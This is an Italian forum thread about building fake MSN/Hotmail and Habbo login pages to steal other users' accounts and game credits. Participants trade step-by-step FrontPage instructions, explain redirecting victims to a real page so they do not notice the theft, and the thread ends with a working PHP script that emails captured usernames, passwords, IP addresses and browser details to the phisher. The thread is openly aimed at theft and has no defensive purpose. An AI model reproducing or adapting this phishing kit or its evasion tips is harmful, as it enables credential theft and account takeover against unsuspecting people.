Come Creare Fake Login Hotmail (msn)

guarda ke esiste anke in habbo!
e come quello di msn soltanto ke quando apri cè la falsa home page di habbo!

non c'entra.. nel fake di habbo quasi nessuno ormai ci casca

li fai cadere in quello di msn, e gli freghi il pg

Non capisco una parte del tuo messagio

Dopo esservi scaricato Frontpage, apritelo ed aprite il File del Login Originale ( scusate il gioco di parole XD ). File > Apri > E selezionate il File.

Aspettate il caricamento richiesto e poi andate nella parte dove dovrete inserire il vostro ID. E cliccate due volte, e su "Nome" inserite "account" e fate OK.
Stessa cosa fate per la parte della Password, però in quel caso inserirete "password". Poi ritornate sul spazio per inserire l'ID e

SCUSAMI CARO UTENTE KE HA CREATO FAKE LOGIN MA QUESTA PARTE NON LA CAPISCO BENE SE PER FAVORE MI VUOI SPIEGARMELA MEGLIO NE SAREI MOLTO CONTENTO SE VUOI SCRIVIMI A TEPPA2@HOTMAIL.IT COSI ALMENO CI PARLIAMO SU MSN,GRAZIE TI SALUTO.KMQ PIACERE ALESSIO
--------------- AGGIUNTA AL POST ---------------
SCUSAMI NON CAPISCO BENE QUESTA PARTE QUI DEL TUO MESSAGIO SE PER FAVORE VORRESTI RISPIEGARMELA MEGLIO Dopo esservi scaricato Frontpage, apritelo ed aprite il File del Login Originale ( scusate il gioco di parole XD ). File > Apri > E selezionate il File.

Aspettate il caricamento richiesto e poi andate nella parte dove dovrete inserire il vostro ID. E cliccate due volte, e su "Nome" inserite "account" e fate OK.
Stessa cosa fate per la parte della Password, però in quel caso inserirete "password". Poi ritornate sul spazio per inserire l'ID e
PERCHE HO DIFFICOLTA AD COMPRENDERLA VOI INFORMATICI VI ESPRIMETE IN UN LINGUAGGIO TECNICO PERO DOVRESTE ANCHE METTERVI NEI PANNI DELLA LINGUA ITALIANA,PER FAVORE SE VUOI MANDAMI UNA MAIL A QUESTO: TEPPA2@HOTMAIL.IT COSIKKE CI PARLIAMO,GRAZIE

Ultima modifica:
ma non è solo per msn! basta che gli carico quei file citati sopra nella guida e poi magari si possono mettere tio foto di habbo ricchissimi per dire che se fai il login qui ti compagliono dei tasti che ti fanno avere i furni rari e crediti a non finire.... insomma basta personalizzare la pagina e poi si può far divenare il login di quello che si vuole no? ah e da quello che ho capito si può anche personalizzare il link di dove porta il tasto accedi giusto?
ma ci vuole perforza frontPage? se per forza allora datemi il download pechè io stò impazzendo per cercarlo!

Ultima modifica:
dove c'è crita tuamail non si puo modificare cerco di scancellare a non fa.....
:emoji_confused:

opo esservi scaricato Frontpage, apritelo ed aprite il File del Login Originale ( scusate il gioco di parole XD ). File > Apri > E selezionate il File.

Non ho capito questo passaggio ; aggiungimi a msn sono leonardo97sora@live.it

Dopo che hai scaricato front page aprilo e clicca su file in alto a sinistra e seleziona i files descritti nella guida.

Ho anche un fake di habbo ma alla fine sono riuscito a farmi solo un misero minibar(su habbo) adesso grazie a questa guida...Posso farmi gli altri sicuramente.
Raga non mi installa front page.
Mi dite che versione e'?Cosi magari me lo scarico da qualche altra parte.

Ultima modifica:
Esiste un modo per mandare a una pagina prestabilita, sempre di internet dopo aver messo i dati?

Tipo, lui fa il fake login, i dati vengono inviati alla mia mail, però dopo la pagina del mio spaces si apre comunque, cosi si evita il solito "Guarda che non mi va", poi "Perchè non va?", e poi "Farabutto, è un fake! Ti denuncio alla postale!!" XD

Spero abbiate capito xD

Se si può fare sarebbe semplice XD Credo di si, sembra una cosa tanto banale O.O

Ma ditemi voi XD

Ok, basta ora dite voi!

:emoji_relieved:

Ehm... ma qui siamo nella sezione Software - Messenger non Hacking.
Non mi sembra che sia molto "Hack" una cosa del genere
Ehm... ma qui siamo nella sezione Software - Messenger non Hacking.
Per fare quello che ho detto:

Quando si è in frontpage, cliccare col mouse destro su "accedi" e fare un semplice collegamento ipertestuale ad un altra pagina web, magari mettete il vostro spaces, oppure uno semplice, fatto veloce! Con il collagamento ipertestuale, la pagina rimane invariata, perciò i dati li invia, però manda ad un altra pagina, cosi ci rispariamo di bloccare quello e perdere la sua fiducia! MOuaumamuoahmaahoauhahhmauo xD

Ultima modifica:
sono arrivato al paggio dell'uppare..devo uppare solo index.html o anche file.php? se li devo uppare tutti e due li devo metttere in .rar?

Riferimento: Come Creare Fake Login Hotmail (msn)

Io quando mi sono registrato su habbo, mi hanno fottuto 3600-3700 crediti sti stronzi con i fake, poi ho creato un fake programe, e mi son preso su il triplo di quello che mi hanno fregato

Io quando mi sono registrato su habbo, mi hanno fottuto 3600-3700 crediti sti stronzi con i fake, poi ho creato un fake programe, e mi son preso su il triplo di quello che mi hanno fregato

snif snif... sento odore di cavolata!

Donde mi trovo Front Page? Non lo trovo da downloaddare T_T

io uso mac e non ho frontpage, dovrei usare dreamweaver come faccio a inserire il modulo?

Ciao a tutti. Scusate ho una domanda. Dov'è il campo "nome" e "password" dato che io visualizzo questo file aprendo il "login.php originale" con Frontpage ??

<?

///////////////////////////////////

$yourmail = "tuamail"; //Inserisci qui il tuo indirizzo di posta

///////////////////////////////////

// DA QUI IN POI NON MODIFICARE NULLA!!

if (getenv(HTTP_X_FORWARDED_FOR)){
$ip = getenv(HTTP_X_FORWARDED_FOR); } else {
$ip = getenv(REMOTE_ADDR); }
$useragent=$_SERVER['HTTP_USER_AGENT'];
$td = date("F jS");
$date = date("d M Y");
$time = date("g:i a");
$LogTime = trim(" Date: ".$date.", Time: ".$time);

mail("$yourmail", "Account $account", "Username: $account \nPassword: $password \n\nIndirizzo IP: $ip \nData log: $LogTime \nSystem Info: $useragent \n\nDarthLord\nwww.msn.com","from: $account <$account>");
header( "Location: index.htm");
?>